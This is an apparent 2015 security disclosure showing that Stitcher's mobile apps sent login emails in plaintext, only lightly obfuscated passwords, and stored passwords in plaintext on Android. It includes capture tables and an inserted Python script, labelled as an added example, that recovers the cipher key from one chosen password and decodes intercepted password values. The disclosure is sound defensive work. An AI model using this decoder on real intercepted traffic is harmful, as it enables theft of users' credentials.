Stitcher Mobile Apps Obfuscate Passwords with Caesar Cipher

Summary

Stitcher is in PC Magazine's 100 Best Android Apps of 2015 (see page 3).

However, the Stitcher Android and iOS apps have a serious security problem: they send login credentials over an unencrypted connection. Instead of transport encryption, they obfuscate the password with a modified Caesar cipher, a position-dependent substitution that is trivial to reverse once a few chosen passwords have been observed.

This practice may be illegal in the USA. In 2014 the FTC sanctioned two American companies, Fandango and Credit Karma, for a much less serious error: using HTTPS but failing to validate the server certificate:

FTC Final Orders with Fandango and Credit Karma Provide Guidance on Mobile App Security

The Stitcher Android app also stores confidential data in plaintext on the Android device, as detailed below.

Testing Method: Android

I have Burp set up as a proxy for my Genymotion Android emulator.

Here's the app:


Sending test credentials:

Harvesting them from Burp:

The email is sent in plaintext. The password is obfuscated with a very simple Caesar-style cipher: each character is moved forward in the alphabet by a number of steps that depends on its position, and a position-dependent padding character is inserted before it. The pattern is obvious from the test cases shown below: in the first position 'a' becomes 'n' (a shift of 13) preceded by 's'; in the second position 'a' becomes 'k' (shift 10) preceded by '5'; in the third position 'a' becomes 'l' (shift 11) preceded by '4'. Changing one plaintext character by one step changes exactly one output character by one step.

Password   epx (value sent by the app)
a          sn
b          so
c          sp
d          sq
e          sr
aa         sn5k
ab         sn5l
ac         sn5m
ad         sn5n
ae         sn5o
aaa        sn5k4l
aab        sn5k4m
aac        sn5k4n

Testing Method: iOS App

I used a MacBook Air, set up as an SSL auditing proxy as explained here:

https://samsclass.info/128/proj/MacBurpWifi.htm

Here's the app:

Sending test credentials:

Harvesting them with Burp:

The email is sent in plaintext. The password is obfuscated with the same kind of very simple Caesar-style cipher: each character is moved forward by a position-dependent number of steps, and a padding character is inserted before it. The iOS variant differs in the details, as the test cases below show. The padding character depends on the class of the input character ('_' before a lowercase letter, '9' before an uppercase letter, '8' before a digit in the first position), while the shifted character depends only on the position and the character's index within its class ('a', 'A' and '1' all become 'F' in the first position). The shifted alphabet also wraps from letters into digits ('ad' becomes '_FL0'). None of this makes the scheme harder to reverse: a handful of chosen passwords reveals the padding and shift for every position.

Password   epx (value sent by the app)
a          _F
b          _G
aa         _FLx
ab         _FLy
ac         _FLz
ad         _FL0
aaa        _FLx-4
aab        _FLx-5
aac        _FLx-6
aaaa       _FLx-474
A          9F
B          9G
C          9H
1          8F
2          8G
11         8FIx
aaaaaaaa   _FLx-474zD3D4u6E
bbbbbbbb   _GLy-575zE3E4v6F
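The chosen-plaintext attack implied by both tables above (Android and iOS) is short enough to show in full. The script below is an added example written for this page; it is not Stitcher's code, and it is not the script the author used. It models the Android observations: one probe password of repeated 'a' reveals the padding character and the shift for each position, after which any captured epx value of that length or shorter can be decoded. The output alphabet is an assumption (the Android captures only show lowercase output; the iOS captures show 'z' wrapping into '0', so lowercase followed by digits is used here). The iOS variant also picks the padding by character class, so a decoder for it would need one probe per class; that is not modelled.

```python
"""
Chosen-plaintext recovery of a per-position padding + Caesar-shift scheme.

Added example for this page, not Stitcher's code. The padding and shift
values are derived from the page's own Android test cases; the alphabet
below is an ASSUMPTION, not something the page confirms.
"""

# ASSUMED output alphabet. The page's iOS data shows 'z' wrapping into '0',
# so lowercase letters followed by digits is a plausible guess.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def recover_key(probe_plain, probe_obf):
    """Derive a (padding, shift) pair per position from one chosen-plaintext probe.

    probe_plain is the password we typed into the app; probe_obf is the epx
    value captured in the proxy. Every plaintext character occupies two
    output characters: the padding character, then the shifted character.
    """
    if len(probe_obf) != 2 * len(probe_plain):
        raise ValueError("expected two output characters per input character")
    key = []
    for i, p in enumerate(probe_plain):
        pad, c = probe_obf[2 * i], probe_obf[2 * i + 1]
        shift = (ALPHABET.index(c) - ALPHABET.index(p)) % len(ALPHABET)
        key.append((pad, shift))
    return key


def deobfuscate(obf, key):
    """Recover a password from a captured epx value using a recovered key."""
    if len(obf) % 2:
        raise ValueError("odd-length value: not a padding/character sequence")
    positions = len(obf) // 2
    if positions > len(key):
        # The probe was shorter than the captured password. A longer probe
        # (e.g. 20 x 'a') is needed before every position can be decoded.
        raise ValueError(f"key covers {len(key)} positions, value has {positions}")
    out = []
    for i in range(positions):
        pad, c = obf[2 * i], obf[2 * i + 1]
        expected_pad, shift = key[i]
        if pad != expected_pad:
            # Padding is fixed per position in the Android captures, so a
            # mismatch means the model (or the alphabet guess) is wrong.
            raise ValueError(f"unexpected padding {pad!r} at position {i}")
        out.append(ALPHABET[(ALPHABET.index(c) - shift) % len(ALPHABET)])
    return "".join(out)


def obfuscate(plain, key):
    """Forward direction, used to confirm the recovered key reproduces captures."""
    if len(plain) > len(key):
        raise ValueError(f"key covers {len(key)} positions, password has {len(plain)}")
    return "".join(pad + ALPHABET[(ALPHABET.index(p) + shift) % len(ALPHABET)]
                   for p, (pad, shift) in zip(plain, key))


# Probe taken from the page's Android table: password "aaa" was sent as "sn5k4l".
ANDROID_KEY = recover_key("aaa", "sn5k4l")

# Further captures from the same table, used to check the recovered key.
ANDROID_CAPTURES = {"sn": "a", "so": "b", "sn5l": "ab", "sn5o": "ae", "sn5k4n": "aac"}


def check_android_table():
    """True if the key recovered from one probe decodes every other capture."""
    return all(deobfuscate(obf, ANDROID_KEY) == plain
               for obf, plain in ANDROID_CAPTURES.items())


if __name__ == "__main__":
    print("recovered key:", ANDROID_KEY)
    print("sn5k4n ->", deobfuscate("sn5k4n", ANDROID_KEY))
    print("table consistent:", check_android_table())
```

The point of the check is that a single three-character probe is enough to decode every three-character-or-shorter password the app ever sends, which is why obfuscation of this kind offers no protection on an unencrypted connection.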

Notification

I sent this message on 6-20-15:

Insecure Local Data Storage

It's 7-28-15 and I have heard nothing further from Stitcher, so I decided to publish this, along with a less severe problem I found later.

I registered an account on my Android device using a password of FLAPPY-PASSWORD:

I used adb to pull the local data from the app's folder to my local Mac system:

Grep easily finds the locally stored password:

That file contains the plaintext email address and password, and, bizarrely, also contains the obfuscated password:

This is a poor security practice, because anyone who obtains an unencrypted phone, or a copy of the app's data directory, can recover the password in the clear and try it against any other account where the user reused it.


Communicated privately to Stitcher 6-20-15 by Sam Bowne
Caesar Cipher added to title and link to FTC action added 7-1-15
Title changed, insecure local storage added, published publicly 7-28-15